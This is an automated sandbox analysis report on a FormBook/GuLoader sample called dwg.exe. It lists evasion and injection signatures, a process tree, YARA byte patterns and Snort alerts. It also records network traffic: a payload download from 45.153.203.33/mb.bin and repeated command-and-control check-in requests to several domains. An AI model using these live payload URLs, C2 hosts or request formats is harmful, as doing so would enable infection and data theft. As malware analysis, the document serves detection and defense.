Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report dwg.exe

Overview

General Information

Sample Name:dwg.exe
Analysis ID:358411
MD5:6a9035b7435c6aa9e6c8e31cf771e316
SHA1:16a6d2ac44b8ac3cbe112916d8cd9912d3f0dbf7
SHA256:6f33f5e3a23420dacdc26fb8e2eef07fe482e634d4b832b0917cbe7ed37864f5
Tags:exeGuLoader
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • dwg.exe (PID: 5316 cmdline: 'C:\Users\user\Desktop\dwg.exe' MD5: 6A9035B7435C6AA9E6C8E31CF771E316)
    • dwg.exe (PID: 1544 cmdline: 'C:\Users\user\Desktop\dwg.exe' MD5: 6A9035B7435C6AA9E6C8E31CF771E316)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6456 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6492 cmdline: /c del 'C:\Users\user\Desktop\dwg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x197a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a84a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166d9:$sqlite3step: 68 34 1C 7B E1
    • 0x167ec:$sqlite3step: 68 34 1C 7B E1
    • 0x16708:$sqlite3text: 68 38 2A 90 C5
    • 0x1682d:$sqlite3text: 68 38 2A 90 C5
    • 0x1671b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16843:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x4eb8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 18 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: dwg.exeReversingLabs: Detection: 27%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
      Source: 13.2.rundll32.exe.4927960.5.unpackAvira: Label: TR/Dropper.Gen
      Source: 13.2.rundll32.exe.6843e8.1.unpackAvira: Label: TR/Dropper.Gen

      Compliance:

      barindex
      Uses 32bit PE filesShow sources
      Source: dwg.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: dwg.exe, 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp, rundll32.exe, 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: dwg.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
      Source: Binary string: rundll32.pdbGCTL source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx13_2_00196A99
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi13_2_001A62C9

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.5:49716 -> 45.153.203.33:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5ca HTTP/1.1Host: www.buytgp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.delmarranch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.apkiinsurance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS HTTP/1.1Host: www.bestcroissantinlondon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.thakehamwesthorsley.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRA HTTP/1.1Host: www.karatetheokinawaway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
      Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
      Source: Joe Sandbox ViewASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
      Source: global trafficHTTP traffic detected: GET /mb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 45.153.203.33Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.33
      Source: global trafficHTTP traffic detected: GET /mb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 45.153.203.33Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5ca HTTP/1.1Host: www.buytgp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.delmarranch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.apkiinsurance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS HTTP/1.1Host: www.bestcroissantinlondon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1Host: www.thakehamwesthorsley.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRA HTTP/1.1Host: www.karatetheokinawaway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1Host: www.guillemaudexcellenceauto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: www.buytgp.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Feb 2021 14:35:24 GMTContent-Type: text/htmlContent-Length: 793Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta n
      Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpString found in binary or memory: http://45.153.203.33/
      Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpString found in binary or memory: http://45.153.203.33/53321935-2125563209-4053062332-1002
      Source: dwg.exeString found in binary or memory: http://45.153.203.33/mb.bin
      Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpString found in binary or memory: http://45.153.203.33/mb.binI;
      Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpString found in binary or memory: http://45.153.203.33/mb.bintSkm
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
